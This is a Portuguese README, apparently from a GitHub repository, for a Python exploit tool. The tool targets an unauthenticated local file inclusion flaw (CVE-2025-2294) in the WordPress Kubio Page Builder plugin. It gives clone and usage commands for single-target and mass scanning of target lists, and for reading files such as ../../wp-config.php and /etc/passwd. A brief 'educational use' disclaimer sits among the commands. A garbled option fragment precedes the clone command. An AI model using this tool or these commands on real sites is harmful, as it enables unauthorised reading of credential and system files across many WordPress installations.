
Exploit de Inclusão de Arquivo Local (LFI) não autenticado para o plugin Kubio Page Builder do WordPress (CVE-2025-2294). Suporta alvo único, varredura em massa, detecção de versão e leitura de caminho de arquivo personalizado.
Exploit de Inclusão de Arquivo Local (LFI) para o plugin Kubio Page Builder do WordPress (versões ≤ 2.5.1).
Esta ferramenta explora uma vulnerabilidade LFI não autenticada no plugin Kubio Page Builder (CVE-2025-2294), permitindo que atacantes leiam arquivos sensíveis em instalações vulneráveis do WordPress.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
Esta ferramenta é apenas para fins educacionais. O desenvolvedor não se responsabiliza por qualquer uso indevido. Sempre obtenha autorização adequada antes de testar qualquer sistema.
| Opção | Descrição |
|---|
-u, --url | URL do alvo único |
-l, --list | Arquivo contendo lista de alvos |
-f, --file | Arquivo a ser lido (padrão: /etc/passwd) |
-o, --output | Salvar alvos vulneráveis em arquivo |